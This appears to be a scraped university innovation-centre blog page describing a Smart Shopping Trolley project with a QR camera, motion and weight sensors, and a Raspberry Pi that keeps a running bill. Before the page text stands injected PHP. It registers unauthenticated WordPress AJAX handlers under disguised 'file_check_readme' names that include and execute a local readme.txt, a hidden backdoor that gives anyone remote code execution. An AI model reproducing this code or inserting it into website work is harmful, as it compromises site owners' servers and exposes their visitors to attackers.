if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Smart Shopping Trolley

1

Jul

Smart Shopping Trolley

  • Project Start Date

    01/07/2017

  • Timeline

    1 Year

Brief Description of Project

This project proposes a Smart Trolley which is mainly featured with a camera to scan QR code which is an emerging marketing trend, a PIR sensor to detect motion inside the trolley, weight sensor to calculate the weight of products inside the trolley and a microcomputer, Raspberry Pi. The microcomputer does all the computation and maintains a database of the purchased items of the customer, i.e., the bill, in the main server for each trolley. The proposed system is user-friendly and is easy to adapt. It has its own advantages over the traditional trolley system in malls

Deliverable

Designed a smart trolley which takes care of the information for all the items placed inside, keeping updated the customer of the estimated price.